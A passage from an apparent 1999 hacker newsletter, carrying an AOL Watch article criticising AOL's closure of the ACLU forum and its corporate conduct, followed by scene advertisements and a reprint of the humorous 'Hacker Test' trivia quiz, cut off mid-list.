The revolution has begun. "We have two accounts with AOL," Menchaca added later, "and the message we're sending them is that when the ACLU goes, so do our accounts." Later, Menchaca added she would also be discontinuing "the other five accounts owned by other members of my family...."

Another host favored an additional plan a poster suggested: "Send e-mails to all the annoying pop-up advertisers saying you regret that soon you won't be plagued by them as you are leaving AOL due to the ACLU forum closure."

"If you have used any of the vendors here on AOL (sent flowers, bought books, made plane reservations, etc...) they would be the ones to target first."

An appropriately inspiring quote from Helen Keller is displayed for visitors to the ACLU area. "I am only one, but still I am one, I cannot do everything, but still I can do something."

AOL Watch invites users who cancel their accounts over the announced closure of the ACLU forum to submit their comments to the AOL Watch web site. ( aclu@aolwatch.com )

"I'm trying to cancel my AOL account, but unable to even get logged on long enough to do so," one AOL Watch reader complained recently. Ironically, had they succeeded in signing on, they would've found that AOL no longer allows users to cancel accounts on-line! (Users must dial 1-800-827-6364.) Several users have also reported that after cancelling their accounts, AOL continued billing them anyways -- and customer service representatives are paid hefty bonuses for dissuading callers from cancelling!

http://www.aolsucks.org/list/0091.html
http://www.aolwatch.org/billprob.htm

One 10th grade student inadvertently identified another problem.
They posted to the ACLU forum that they were so angry with closure worries that, "Come November, I'll probably move to Compuserve." "AOL owns Compuserve now, too," an ACLU Board host observed. In fact, the New York Times notes that 39% of the time Americans spend on-line is spent using services AOL controls. http://www.nytimes.com/library/tech/99/07/biztech/articles/04aoll.html And AOL "will set out to subsume all other media by delivering its service on television screens, cellular telephones and myriad other devices, in addition to computers," the Times reported. AOL's power over the ACLU's on-line area may soon be magnified across many other realms of content. AOL is also scurrying for ownership of traditional broadcast mediums and is releasing a line of AOL-branded books -- and they've even formed an alliance with CompUSA. http://www.news.com/News/Item/0,4,35867,00.html http://www.news.com/News/Item/0,4,36140,00.html http://cbs.marketwatch.com/archive/19990827/news/current/aol.htx Plans for AOL TV, at least, have drawn skepticism. "The 2000 release target supersedes previous launch dates 1997, 1998, and 1999," one on-line commentator noted. ( http://www.suck.com/daily/99/05/13/ ) But an inflated stock price has enabled AOL to purchase already-existing communications products -- including Netscape, ICQ, WinAmp, Shoutcast, and even Moviefone. And with ownership, these companies come under AOL's corporate philosophy. AOL-owned ICQ recently used a word-filtering accessory drawing on copyrighted material from CyberSitter, according to Wired News. In a recent story, the software company's President described the list being used as "illegally obtained." http://www.wired.com/news/news/technology/story/18567.html But more importantly, Wired News notes that the chosen list blocked references even to the National Organization for Women and the Gay and Lesbian Alliance Against Defamation, as well as any use of the words "safe sex" and "gay rights."
http://www.wired.com/news/news/business/story/18516.html AOL's oversight has seen unfortunate incidents. In June, Wired News also reported that intercepted cell phone conversations were being broadcast over AOL's Shoutcast Service. http://www.wired.com/news/news/technology/story/20405.html AOL's wide-reaching influence is starting to create suspicions. Earlier this year the domain aolsearch.com belonged to a web designer in New Jersey. C|Net reported that AOL contacted Network Solutions Incorporated, the organization which oversees domain names -- and the group later revoked the woman's ownership for failing to include her suite number with her address! http://www.news.com/News/Item/0,4,38419,00.html http://www.aolwatch.org/aolsearch.htm Every AOL session now includes a reminder of the incident -- since all sessions on AOL now include a mandatory pop-up ad for AOL's search engine. Calling it "the most lame search engine of all," one user e-mailed keyword "suggestions" with a request to remove the mandatory ad -- "and got a response that did not refer in any way to my question." Days after the aolsearch incident, critics at Inside-AOL.com had their connection to the internet severed. Salon reports that AOL officials had complained about two screen-shots they said infringed their copyright -- but the site's webmaster warned Salon of a larger issue. "The thought of so much power in the hands of a company that seems to know no limits in moving to silence its enemies is scary." http://www.salon.com/tech/log/1999/07/01/inside_aol/index.html Indeed, nearly identical pressures were once brought against "Recondite Information" -- a highly critical site documenting AOL security breaches with similar screen-shots of AOL software. Charges of "copyright infringement" were directed to the site's service provider yet again -- but this time the information was preserved by a series of mirror sites. (Including the "Why AOL Sucks" page.) 
http://www.aolsucks.org/security/index.html These concerns were given new urgency when AOL successfully lobbied for the ability to handle domain name registrations themselves. http://www.icann.org/icann-pr21apr99.htm http://www.news.com/News/Item/0,4,35752,00.html In fact, in several incidents AOL has started quietly asserting their control over the flow of on-line communication. Recently, AOL even sued AT&T asserting intellectual property claims to phrases like "You've Got Mail." http://www.thestandard.net/articles/display/0,1449,5923,00.html A judge threw out the lawsuit -- but AOL continued undaunted. They've also trademarked the name "knock-knock" for an instant message feature. But in a much larger tactic, AOL blocked Microsoft customers from messaging AOL customers. One analyst told the San Francisco Chronicle, "In the online chat rooms, people seem to be turning against AOL about 5 to 1..." Yet AOL persists, apparently ignoring their customers' wishes -- and their real motive may be controlling that audience so they can better flood them with AOL advertisements! The Chronicle notes messaging applications "provide an ideal platform for gathering profile data on users and then saturating them with targeted advertisements...." http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1999/07/27/BU65444.DTL AT&T General Counsel Jim Cicconi told C|Net that AOL "has now made evident the closed nature of its own system by sabotaging instant messaging communications between its customers and those of other ISPs." In fact, one of AOL's first moves with the newly-acquired Mozilla browser -- after closing several popular Netscape forums -- was to stifle a plan to make it compatible with various chat clients.
http://www.news.com/News/Item/0,4,84-39736,00.html http://www.news.com/News/Item/0,4,35473,00.html http://www.news.com/News/Item/0,4,34867,00.html http://www.salon.com/tech/feature/1999/04/06/netcenter/index1.html Even AOL's participation in an internet content rating association could also be a double-edged sword. C|Net notes concerns that the problem with ratings is "major online service providers could marginalize sites that don't adopt them." http://www.news.com/News/Item/0,4,41248,00.html In May AOL's Steve Case was admitted to a White House brain-storming session on youth violence -- and AOL continues to assert their interests in forums large and small. Last week AOL's lawyers told the Florida Supreme Court the on-line service could not be sued for a user's selling of a child pornography videotape in AOL's chat rooms -- even though, according to a lawyer for one of the children in the videotapes, AOL knew about the sales. http://www.gopbi.com/partners/pbpost/epaper/editions/thursday/news_3.html http://tampatrib.com/news/thur100d.htm But AOL's detractors are striking back. The White House also became the target for a demonstration in July from disgruntled AOL Community Leaders. http://www.observers.net/protest.html AOL had established new policies prohibiting minors from participating in the Community Leader program -- though a San Francisco labor lawyer told the New York Times that AOL's move could inadvertently buttress an ongoing Department of Labor investigation. Some Community Leaders have even taken to court themselves, filing a class action lawsuit seeking to change the way they're treated by AOL. http://www.nytimes.com/library/tech/99/05/cyber/articles/26aol.html http://www.observers.net/cas_details.html But this controversy echoes two remarkable lawsuits filed in 1995. Former volunteer Stanley Parker took AOL to a Los Angeles small claims court -- and the court granted him subpoenas for AOL president Ted Leonsis! 
It's never been clear whether Leonsis was aware of the subpoenas, but as San Francisco Deputy Mary Smith tracked Leonsis at the Jupiter Communications conference (where he was scheduled to make an appearance), Leonsis suddenly remembered another appointment, and he was replaced at the last minute by Steve Case.... "It didn't make much difference because they didn't show up," Parker remembered -- and he won his case by default. (AOL had sent the courts a notice disputing the jurisdiction, but it never arrived.) Parker was then contacted by an AOL lawyer who Parker says tried to intimidate him with threats of an appeal. "She said I could take her offer, or they would proceed to ask the court to vacate the judgment -- and informed me that the court would do so." In a November 1995 press release, Parker remembers the result of that hearing. "Commissioner Nyby asked the AOL attorney if he was the representative from Virginia. When the attorney replied 'No,' Commissioner Nyby said 'Motion denied, next case'." http://www.aolwatch.org/verdict2.htm http://www.starkrealities.com/check/btw.html Parker felt vindicated in several ways. "One of the reasons why I filed my first lawsuit was to prove you could." At about the same time a friend of Parker's named Erroll Trobee -- another former volunteer in Pennsylvania -- was also suing AOL in his own local small claims court for failure to pay back wages. AOL also argued against the jurisdiction in that case -- and lost. The cases should have been a warning to AOL about the legal issues they're now facing. In 1995 Trobee told a San Francisco legal newspaper that "This case will never go to trial, because the implications are too great if they lose. It could change the way people think about minimum wage and who you have to consider an employee." http://www.aolwatch.org/parker.htm AOL also faces threats in the marketplace.
Rob Enderle, an analyst with the Giga Information Group, told C|Net that "being the largest doesn't necessarily make you more than a target." ( http://www.news.com/News/Item/0,4,84-37719,00.html ) In fact, last week PC World cited reports from Zona Research that showed AOL's share of the top markets had fallen, from 6 out of 10 respondents to just 4 out of 10 respondents. A spokesperson for a local internet service in Portland explained to the news organization that "As more people become educated consumers, they realize there are other products and services available." http://www.andovernews.com/cgi-bin/news_story.pl?32451/AOLWatch Earthlink CEO Sky Dayton is more blunt. "AOL's approach is to dumb down the Internet experience," he told CBS's MarketWatch. "People actually aren't dumb." http://cbs.marketwatch.com/archive/19990719/news/current/renegade.htx Other services are also anxious to pick up disgruntled AOL subscribers. Excite's Chief Executive told the New York Times that "more than half our new customers are ex-AOL users" -- and AOL now faces the possibility of a $90 million advertising blitz by Mindspring. "We want to become a serious competitor to AOL," Mindspring's marketing director told Reuters. "Nobody has stood up and proclaimed being an alternative to AOL." Their ad campaign's slogan? "You'd be happier using Mindspring." http://www.nytimes.com/library/tech/99/07/biztech/articles/04aoll.html http://biz.yahoo.com/rf/990903/32.html But the opposition to AOL has moved beyond billboards. As AOL lobbied for access to San Francisco cable lines, Excite placed protestors dressed as pawns on a chess board in front of City Hall. Their message? "Don't be a pawn in AOL's game." http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1999/07/05/BU103415.DTL Ultimately, AOL's demands were voted down. And just weeks later, Microsoft was making noises that threatened AOL's core business!
In early August, Microsoft announced they were considering an internet service that would be much cheaper than AOL -- if not free! http://cbs.marketwatch.com/archive/19990805/news/current/aol.htx?source=blq/yhoo&dist=yhoo That week AOL's stock price fell lower than it had been since January. But large shareholders had already cashed in $4.61 billion worth of AOL stock in April, the Associated Press reported. Later investors were shaken when even Steve Case sold off 9 percent of his stock, and AOL President Robert Pittman sold 13 percent. Changing stock prices are enough to affect a company's operation, the Washington Post reports. Drops "can wipe out paper fortunes, damage morale, crimp expansion prospects and darken the company's very view of the future." http://cbs.marketwatch.com/archive/19990726/news/current/net.htx?source=blq/yhoo&dist=yhoo http://www.washingtonpost.com/wp-srv/business/feed/a31029-1999aug6.htm In fact, stock may affect one very important facet of AOL -- the motivation of employees waiting on their stock options! The Washington Post also ran a profile of an AOL content producer whose previous positions included "clerking at Kmart, washing dishes at Lobster King and scrubbing toilets in a factory." Because of company stock options, he was able to retire from AOL a millionaire at the age of 27 -- and he vividly described four years at AOL waiting to be eligible for the options. "I wallowed in mediocrity and underachieved like I always do, and I survived." In the early days, the employee remembered, "Sometimes all the staffers would quit what they were working on and play video games." Later, dissatisfied with the company, the Post reports that the employee "made a conscious decision to underachieve. He would float along below radar level until he hit the magical four-year mark and his stock options could be cashed in."
http://www.washingtonpost.com/wp-srv/style/daily/aug99/gilded1.htm Though AOL has made a series of successful business decisions, it's all but abandoned the user experiences -- at least, judging by the comments of one AOL Watch reader. "The Web browser, the e-mail, the chat rooms, the security, the whole AOL experience is just plain awful. Terrible. Pitiful. Not even worth wasting any more of my time on." Even AOL's "Letter from Steve Case" hasn't been updated since June. September 6 Case was still trumpeting resources to "finalize summer plans" -- "Now that school years are ending and summer is upon us." Case's message inadvertently taunted September readers with 30 Summer Escapes and Family Summer vacations, and promised "Later this summer, look for Summer Boredom Busters..." Meanwhile, "Steve's Mailbag" answers the ancient question "Why should I upgrade to AOL 4.0? What does it offer that AOL 3.0 doesn't?" But the growing list of dissatisfied customers now includes the large numbers dreading the closure of the ACLU forum. "I wish it were a joke or scam," Message Host Susan Menchaca posted to the forum, "but it's not; it's true. I've already received an official e-mail from the ACLU confirming it." Unfortunately, customers seeking explanations from AOL receive less-informed answers. "As far as I am aware the ACLU area will not be closed down," one AOL support staffer replied. "This is an area that many of our members use so there is no reason for it to close down." (The message then referred the user to AOL's technical support area. "Thank you for using AOL!!!!" it concluded. "Regards, AOL Technical Support.") "I've already received verification from the 'top' that ACLU is being closed down," Menchaca posted -- "and I trust them a lot more than AOL tech support." THE LAST LAUGH AOL's attempts to publicize their search engine seem to have turned the other search engines against them. Visiting AskJeeves.com with the question "Why do you suck?"
produced a number of evasive answers collated from search engines around the web. Results from InfoSeek pointed users to a site answering the question: "Why stop supporting AOL?" David Cassel More information - http://www.gettingit.com/static/mirror/americaonlineboots.html http://www.riotgrrl.com/archive/cyber2.htm http://www.pathfinder.com/time/digital/daily/0,2822,11615,00.html http://www.zdnet.com/zdnn/stories/news/0,4586,2270607,00.html http://www.wired.com/news/news/business/story/21473.html ~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~ Please forward with subscription information. To subscribe to this list, type your correct e-mail address in the form at the bottom of the page at http://www.aolsucks.org -- or send e-mail to MAJORDOMO@AOLWATCH.ORG containing the phrase SUBSCRIBE AOLWATCH To unsubscribe from the list, send a message to MAJORDOMO@AOLWATCH.ORG containing the phrase UNSUBSCRIBE AOLWATCH. ~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~ @HWA -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read on for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. 
* * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com # Support 2600.com and the Free Kevin defense fund site, visit it now! FREE KEVIN! # www.2600.com One of our sponsors, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous...
Since you're here check out the (now dated) Hacker Purity test at the url following...: http://www.armory.com/tests/hacker.html for an online test with instant results (it will reckon up your score online after you complete the test which is just wizard..guffah - Ed) THE HACKER TEST - Version 1.0 From NutWorks, the former Bitnet humour group Submitted-by: claudio@amsoft.imp.com (Claudio Nieder, Uster, Switzerland) Preface: 06.16.89 This test was conceived and written by Felix Lee, John Hayes and Angela Thomas at the end of the spring semester, 1989. It has gone through many revisions prior to this initial release, and will undoubtedly go through many more. (Slight revisions by William Ward on 12.08.89) Herewith a compendium of fact and folklore about computer hackerdom, cunningly disguised as a test. Check all boxes for which your answer is "yes". The "submit" button is at the bottom. 1.And now for the questions... 1. 0x000 Have you ever owned a computer? 2. 0x001 Have you ever used a computer? 3. 0x002 ... for more than 4 hours continuously? 4. 0x003 ... more than 8 hours? 5. 0x004 ... more than 16 hours? 6. 0x005 ... more than 32 hours? 7. 0x006 Have you ever patched paper tape? 8. 0x007 Have you ever missed a class while programming? 9. 0x008 ... Missed an examination? 10. 0x009 ... Missed a wedding? 11. 0x00A ... Missed your own wedding? 12. 0x00B Have you ever programmed while intoxicated? 13. 0x00C ... Did it make sense the next day? 14. 0x00D Have you ever written a flight simulator? 15. 0x00E Have you ever voided the warranty on your equipment? 16. 0x00F Ever change the value of 4? 17. 0x010 ... Unintentionally? 18. 0x011 ... In a language other than Fortran? 19. 0x012 Do you use DWIM to make life interesting? 20. 0x013 Have you named a computer? 21. 0x014 Do you complain when a "feature" you use gets fixed? 22. 0x015 Do you eat slime-molds? 23. 0x016 Do you know how many days old you are? 24. 0x017 Have you ever wanted to download pizza? 25. 
0x018 Have you ever invented a computer joke? 26. 0x019 ... Did someone not 'get' it? 27. 0x01A Can you recite Jabberwocky? 28. 0x01B ... Backwards? 29. 0x01C Have you seen "Donald Duck in Mathemagic Land"? 30. 0x01D Have you seen "Tron"? 31. 0x01E Have you seen "Wargames"? 32. 0x01F Do you know what ASCII stands for? 33. 0x020 ... EBCDIC? 34. 0x021 Can you read and write ASCII in hex or octal? 35. 0x022 Do you know the names of all the ASCII control codes? 36. 0x023 Can you read and write EBCDIC in hex? 37. 0x024 Can you convert from EBCDIC to ASCII and vice versa? 38. 0x025 Do you know what characters are the same in both ASCII and EBCDIC? 39. 0x026 Do you know maxint on your system? 40. 0x027 Ever define your own numerical type to get better precision? 41. 0x028 Can you name powers of two up to 2**16 in arbitrary order? 42. 0x029 ... up to 2**32? 43. 0x02A ... up to 2**64? 44. 0x02B Can you read a punched card, looking at the holes? 45. 0x02C ... feeling the holes? 46. 0x02D Have you ever patched binary code? 47. 0x02E ... While the program was running? 48. 0x02F Have you ever used program overlays? 49. 0x030 Have you met any IBM vice-president? 50. 0x031 Do you know Dennis, Bill, or Ken? 51. 0x032 Have you ever taken a picture of a CRT? 52. 0x033 Have you ever played a videotape on your CRT? 53. 0x034 Have you ever digitized a picture? 54. 0x035 Did you ever forget to mount a scratch monkey? 55. 0x036 Have you ever optimized an idle loop? 56. 0x037 Did you ever optimize a bubble sort? 57. 0x038 Does your terminal/computer talk to you? 58. 0x039 Have you ever talked into an acoustic modem? 59. 0x03A ... Did it answer? 60. 0x03B Can you whistle 300 baud? 61. 0x03C ... 1200 baud? 62. 0x03D Can you whistle a telephone number? 63. 0x03E Have you witnessed a disk crash? 64. 0x03F Have you made a disk drive "walk"? 65. 0x040 Can you build a puffer train? 66. 0x041 ... Do you know what it is? 67. 0x042 Can you play music on your line printer? 68. 0x043 ... 
Your disk drive? 69. 0x044 ... Your tape drive? 70. 0x045 Do you have a Snoopy calendar? 71. 0x046 ... Is it out-of-date? 2.Do you have a line printer picture of... 1. 0x047 ... the Mona Lisa? 2. 0x048 ... the Enterprise? 3. 0x049 ... Einstein? 4. 0x04A ... Oliver? 5. 0x04B Have you ever made a line printer picture? 3.Do you know what the following stand for? 1. 0x04C ... DASD 2. 0x04D ... Emacs 3. 0x04E ... ITS 4. 0x04F ... RSTS/E 5. 0x050 ... SNA 6. 0x051 ... Spool 7. 0x052 ... TCP/IP 4.Have you ever used: 1. 0x053 ... TPU? 2. 0x054 ... TECO? 3. 0x055 ... Emacs? 4. 0x056 ... ed? 5. 0x057 ... vi? 6. 0x058 ... Xedit (in VM/CMS)? 7. 0x059 ... SOS? 8. 0x05A ... EDT? 9. 0x05B ... Wordstar? 10. 0x05C Have you ever written a CLIST? 11. 0x05D Have you ever programmed in the X windowing system? 12. 0x05E ... CICS? 13. 0x05F Have you ever received a Fax or a photocopy of a floppy? 14. 0x060 Have you ever shown a novice the "any" key? 15. 0x061 ... Was it the power switch? 16. 0x062 Have you ever attended Usenix? 17. 0x063 ... DECUS? 18. 0x064 ... SHARE? 19. 0x065 ... SIGGRAPH? 20. 0x066 ... NetCon? 21. 0x067 Have you ever participated in a standards group? 22. 0x068 Have you ever debugged machine code over the telephone? 23. 0x069 Have you ever seen voice mail? 24. 0x06A ... Can you read it? 25. 0x06B Do you solve word puzzles with an on-line dictionary? 26. 0x06C Have you ever taken a Turing test? 27. 0x06D ... Did you fail? 28. 0x06E Ever drop a card deck? 29. 0x06F ... Did you successfully put it back together? 30. 0x070 ... Without looking? 31. 0x071 Have you ever used IPCS? 32. 0x072 Have you ever received a case of beer with your computer? 33. 0x073 Does your computer come in 'designer' colors? 34. 0x074 Ever interrupted a UPS? 35. 0x075 Ever mask an NMI? 36. 0x076 Have you ever set off a Halon system? 37. 0x077 ... Intentionally? 38. 0x078 ... Do you still work there? 39. 0x079 Have you ever hit the emergency power switch? 40. 0x07A ... Intentionally? 41. 
0x07B Do you have any defunct documentation? 42. 0x07C ... Do you still read it? 43. 0x07D Ever reverse-engineer or decompile a program? 44. 0x07E ... Did you find bugs in it? 45. 0x07F Ever help the person behind the counter with their terminal/computer? 46. 0x080 Ever tried rack mounting your telephone? 47. 0x081 Ever thrown a computer from more than two stories high? 48. 0x082 Ever patched a bug the vendor does not acknowledge? 49. 0x083 Ever fix a hardware problem in software? 50. 0x084 ... Vice versa? 51. 0x085 Ever belong to a user/support group? 52. 0x086 Ever been mentioned in Computer Recreations? 53. 0x087 Ever had your activities mentioned in the newspaper? 54. 0x088 ... Did you get away with it? 55. 0x089 Ever engage a drum brake while the drum was spinning? 56. 0x08A Ever write comments in a non-native language? 57. 0x08B Ever physically destroy equipment from software? 58. 0x08C Ever tried to improve your score on the Hacker Test? 59. 0x08D Do you take listings with you to lunch? 60. 0x08E ... To bed? 61. 0x08F Ever patch a microcode bug? 62. 0x090 ... around a microcode bug? 63. 0x091 Can you program a Turing machine? 64. 0x092 Can you convert postfix to prefix in your head? 65. 0x093 Can you convert hex to octal in your head? 66. 0x094 Do you know how to use a Kleene star? 67. 0x095 Have you ever starved while dining with philosophers? 68. 0x096 Have you solved the halting problem? 69. 0x097 ... Correctly? 70. 0x098 Ever deadlock trying to eat spaghetti? 71. 0x099 Ever written a self-reproducing program? 72. 0x09A Ever swapped out the swapper? 73. 0x09B Can you read a state diagram? 74. 0x09C ... Do you need one? 75. 0x09D Ever create an unkillable program? 76. 0x09E ... Intentionally? 77. 0x09F Ever been asked for a cookie? 78. 0x0A0 Ever speed up a system by removing a jumper? 5.Do you know... 1. 0x0A1 Do you know who wrote Rogue? 2. 0x0A2 ... Rogomatic? 3. 0x0A3 Do you know Gray code? 4. 0x0A4 Do you know what HCF means? 5. 0x0A5 ... Ever use it?
6. 0x0A6 ... Intentionally? 7. 0x0A7 Do you know what a lace card is? 8. 0x0A8 ... Ever make one? 9. 0x0A9 Do you know the end of the epoch? 10. 0x0AA ... Have you celebrated the end of an epoch? 11. 0x0AB ... Did you have to rewrite code? 12. 0x0AC Do you know the difference between DTE and DCE? 13. 0x0AD Do you know the RS-232C pinout? 14. 0x0AE ... Can you wire a connector without looking? 6.Do you have... 1. 0x0AF Do you have a copy of Dec Wars? 2. 0x0B0 Do you have the Canonical Collection of Lightbulb Jokes? 3. 0x0B1 Do you have a copy of the Hacker's dictionary? 4. 0x0B2 ... Did you contribute to it? 5. 0x0B3 Do you have a flowchart template? 6. 0x0B4 ... Is it unused? 7. 0x0B5 Do you have your own fortune-cookie file? 8. 0x0B6 Do you have the Anarchist's Cookbook? 9. 0x0B7 ... Ever make anything from it? 10. 0x0B8 Do you own a modem? 11. 0x0B9 ... a terminal? 12. 0x0BA ... a toy computer? 13. 0x0BB ... a personal computer? 14. 0x0BC ... a minicomputer? 15. 0x0BD ... a mainframe? 16. 0x0BE ... a supercomputer? 17. 0x0BF ... a hypercube? 18. 0x0C0 ... a printer? 19. 0x0C1 ... a laser printer? 20. 0x0C2 ... a tape drive? 21. 0x0C3 ... an outmoded peripheral device? 22. 0x0C4 Do you have a programmable calculator? 23. 0x0C5 ... Is it RPN? 24. 0x0C6 Have you ever owned more than 1 computer? 25. 0x0C7 ... 4 computers? 26. 0x0C8 ... 16 computers? 27. 0x0C9 Do you have a SLIP line? 28. 0x0CA ... a T1 line? 29. 0x0CB Do you have a separate phone line for your terminal/computer? 30. 0x0CC ... Is it illegal? 31. 0x0CD Do you have core memory? 32. 0x0CE ... drum storage? 33. 0x0CF ... bubble memory? 34. 0x0D0 Do you use more than 16 megabytes of disk space? 35. 0x0D1 ... 256 megabytes? 36. 0x0D2 ... 1 gigabyte? 37. 0x0D3 ... 16 gigabytes? 38. 0x0D4 ... 256 gigabytes? 39. 0x0D5 ... 1 terabyte? 40. 0x0D6 Do you have an optical disk/disk drive? 41. 0x0D7 Do you have a personal magnetic tape library? 42. 0x0D8 ... Is it unlabelled? 43. 
0x0D9 Do you own more than 16 floppy disks? 44. 0x0DA ... 64 floppy disks? 45. 0x0DB ... 256 floppy disks? 46. 0x0DC ... 1624 floppy disks? 47. 0x0DD Do you have any 8-inch disks? 48. 0x0DE Do you have an internal stack? 49. 0x0DF Do you have a clock interrupt? 50. 0x0E0 Do you own volumes 1 to 3 of _The Art of Computer Programming_? 51. 0x0E1 ... Have you done all the exercises? 52. 0x0E2 ... Do you have a MIX simulator? 53. 0x0E3 ... Can you name the unwritten volumes? 54. 0x0E4 Can you quote from _The Mythical Man-month_? 55. 0x0E5 ... Did you participate in the OS/360 project? 56. 0x0E6 Do you have a TTL handbook? 57. 0x0E7 Do you have printouts more than three years old? 7.Career questions 1. 0x0E8 Do you have a job? 2. 0x0E9 ... Have you ever had a job? 3. 0x0EA ... Was it computer-related? 4. 0x0EB Do you work irregular hours? 5. 0x0EC Have you ever been a system administrator? 6. 0x0ED Do you have more megabytes than megabucks? 7. 0x0EE Have you ever downgraded your job to upgrade your processing power? 8. 0x0EF Is your job secure? 9. 0x0F0 ... Do you have code to prove it? 10. 0x0F1 Have you ever had a security clearance? 8.Games 1. 0x0F2 Have you ever played Pong? 2. 0x0F3 ... Spacewar? 3. 0x0F4 ... Star Trek? 4. 0x0F5 ... Wumpus? 5. 0x0F6 ... Lunar Lander? 6. 0x0F7 ... Empire? 7. 0x0F8 Have you ever beaten Moria 4.8? 8. 0x0F9 ... Rogue 3.6? 9. 0x0FA ... Rogue 5.3? 10. 0x0FB ... Larn? 11. 0x0FC ... Hack 1.0.3? 12. 0x0FD ... Nethack 2.4? 13. 0x0FE Can you get a better score on Rogue than Rogomatic? 14. 0x0FF Have you ever solved Adventure? 15. 0x100 ... Zork? 16. 0x101 Have you ever written any redcode? 17. 0x102 Have you ever written an adventure program? 18. 0x103 ... a real-time game? 19. 0x104 ... a multi-player game? 20. 0x105 ... a networked game? 21. 0x106 Can you out-doctor Eliza? 9.Hardware 1. 0x107 Have you ever used a light pen? 2. 0x108 ... did you build it? 3. 0x109 Have you ever used a teletype? 4. 0x10A ... a paper tape? 5. 0x10B ... 
a decwriter? 6. 0x10C ... a card reader/punch? 7. 0x10D ... a SOL? 8. 0x10E Have you ever built an Altair? 9. 0x10F ... a Heath/Zenith computer? 10. 0x110 Do you know how to use an oscilloscope? 11. 0x111 ... a voltmeter? 12. 0x112 ... a frequency counter? 13. 0x113 ... a logic probe? 14. 0x114 ... a wirewrap tool? 15. 0x115 ... a soldering iron? 16. 0x116 ... a logic analyzer? 17. 0x117 Have you ever designed an LSI chip? 18. 0x118 ... has it been fabricated? 19. 0x119 Have you ever etched a printed circuit board? 10.Historical 1. 0x11A Have you ever toggled in boot code on the front panel? 2. 0x11B Can you program an Eniac? 3. 0x11C Ever seen a 90 column card? 11.IBM 1. 0x11D Do you recite IBM part numbers in your sleep? 2. 0x11E Do you know what IBM part number 7320154 is? 3. 0x11F Do you understand 3270 data streams? 4. 0x120 Do you know what the VM privilege classes are? 5. 0x121 Have you IPLed an IBM off the tape drive? 6. 0x122 ... off a card reader? 7. 0x123 Can you sing something from the IBM Songbook? 12.Languages 1. 0x124 Do you know more than 4 programming languages? 2. 0x125 ... 8 languages? 3. 0x126 ... 16 languages? 4. 0x127 ... 32 languages? 5. 0x128 Have you ever designed a programming language? 6. 0x129 Do you know what Basic stands for? 7. 0x12A ... Pascal? 8. 0x12B Can you program in Basic? 9. 0x12C ... Do you admit it? 10. 0x12D Can you program in Cobol? 11. 0x12E ... Do you deny it? 12. 0x12F Do you know Pascal? 13. 0x130 ... Modula-2? 14. 0x131 ... Oberon? 15. 0x132 ... More than two Wirth languages? 16. 0x133 ... Can you recite a Niklaus Wirth joke? 17. 0x134 Do you know Algol-60? 18. 0x135 ... Algol-W? 19. 0x136 ... Algol-68? 20. 0x137 ... Do you understand the Algol-68 report? 21. 0x138 ... Do you like two-level grammars? 22. 0x139 Can you program in assembler on 2 different machines? 23. 0x13A ... on 4 different machines? 24. 0x13B ... on 8 different machines? 25. 0x13C Do you know APL? 26. 0x13D ... Ada? 27. 0x13E ... BCPL? 28.
0x13F ... C++? 29. 0x140 ... C? 30. 0x141 ... Comal? 31. 0x142 ... Eiffel? 32. 0x143 ... Forth? 33. 0x144 ... Fortran? 34. 0x145 ... Hypertalk? 35. 0x146 ... Icon? 36. 0x147 ... Lisp? 37. 0x148 ... Logo? 38. 0x149 ... MIIS? 39. 0x14A ... MUMPS? 40. 0x14B ... PL/I? 41. 0x14C ... Pilot? 42. 0x14D ... Plato? 43. 0x14E ... Prolog? 44. 0x14F ... RPG? 45. 0x150 ... Rexx (or ARexx)? 46. 0x151 ... SETL? 47. 0x152 ... Smalltalk? 48. 0x153 ... Snobol? 49. 0x154 ... VHDL? 50. 0x155 ... any assembly language? 51. 0x156 Can you talk VT-160? 52. 0x157 ... Postscript? 53. 0x158 ... SMTP? 54. 0x159 ... UUCP? 55. 0x15A ... English? 13.Micros 1. 0x15B Ever copy a copy-protected disk? 2. 0x15C Ever create a copy-protection scheme? 3. 0x15D Have you ever made a "flippy" disk? 4. 0x15E Have you ever recovered data from a damaged disk? 5. 0x15F Ever boot a naked floppy? 14.Networking 1. 0x160 Have you ever been logged in to two different timezones at once? 2. 0x161 Have you memorized the UUCP map for your country? 3. 0x162 ... For any country? 4. 0x163 Have you ever found a sendmail bug? 5. 0x164 ... Was it a security hole? 6. 0x165 Have you memorized the HOSTS.TXT table? 7. 0x166 ... Are you up to date? 8. 0x167 Can you name all the top-level nameservers and their addresses? 9. 